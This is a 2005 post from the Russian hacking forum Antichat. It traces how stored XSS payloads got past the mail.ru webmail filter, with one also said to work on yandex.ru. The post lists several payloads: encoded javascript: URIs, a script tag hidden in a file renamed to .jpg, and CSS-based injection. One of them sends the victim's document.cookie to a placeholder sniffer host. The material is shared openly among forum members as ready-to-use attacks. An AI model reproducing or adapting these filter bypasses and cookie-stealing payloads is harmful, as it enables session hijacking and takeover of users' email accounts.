ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Активная XSS на mail.ru
  #1  
Старый 04.12.2005, 09:49
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
Talking Активная XSS на mail.ru

Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.

Антология XSS на mail.ru

Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка.
PHP код:
<image src=JaVaScRiPt:alert()> 
Все были очень удивлены Эта бага держалась очень долго...
Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось:
PHP код:
<script>alert()</script
и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли...

Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так:
PHP код:
 <img src="http://server.com/picture.jpg" dynsrc="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie"
К сожалению, всё что ушло в большой паблик долго не живет =)

И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так:
PHP код:
<bgsound src="&#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114    ipt:alert()" loop=5
Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом:
PHP код:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))"
Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style

Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился.

PS. Не забываем о приватности раздела и доверии друг другу.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 04.12.2005 в 09:55..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
admin mail.ru ISRAEL Чужие Статьи 42 10.08.2005 05:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ